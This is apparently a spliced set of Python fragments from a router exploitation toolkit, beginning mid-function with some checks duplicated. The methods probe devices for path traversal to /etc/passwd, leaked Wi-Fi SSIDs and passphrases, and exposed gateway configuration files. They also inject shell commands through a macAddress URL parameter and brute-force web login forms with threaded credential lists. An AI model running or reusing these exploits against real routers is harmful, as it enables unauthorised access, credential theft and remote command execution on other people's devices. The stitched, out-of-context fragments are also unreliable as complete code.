return r.text
def check(self):
url = sanitize_url("{}:{}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if "root:" in response.text:
return True # target vulnerable
return False # target is not vulnerable
def check(self):
url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if any(map(lambda x: x in response.text, ["SSID", "PassPhrase"])):
return True # target is vulnerable
return False # target is not vulnerable
def execute(self, cmd):
url = sanitize_url("{}:{}/{}?writeData=true®info=0&macAddress= 001122334455 -c 0 ;{}; echo #".format(self.target, self.port, self.valid_resource, cmd))
try:
r = requests.get(url)
except requests.exceptions.MissingSchema:
return "Invalid URL format: %s" % url
except requests.exceptions.ConnectionError:
return "Connection error: %s" % url
return ""
def check(self):
url = sanitize_url("{}:{}/hidden_info.html".format(
self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if any(map(lambda x: x in response.text, ["SSID", "PassPhrase"])):
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
url = sanitize_url("{}:{}/goform/system/GatewaySettings.bin".format(
self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and "0Mlog" in response.text:
return True # target is vulnerable
else:
return False # target is not vulnerable
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port,
self.get_form_path()))
try:
requests.get(url, verify=False)
except (requests.exceptions.MissingSchema,
requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
return
# authentication type
if self.form == 'auto':
form_data = self.detect_form()
if form_data is None:
print_error("Could not detect form")
return
(form_action, self.data) = form_data
if form_action:
self.path = form_action
else:
self.data = self.form
print_status("Using following data: ", self.data)
# invalid authentication
self.invalid_auth()
# running threads
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords))
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
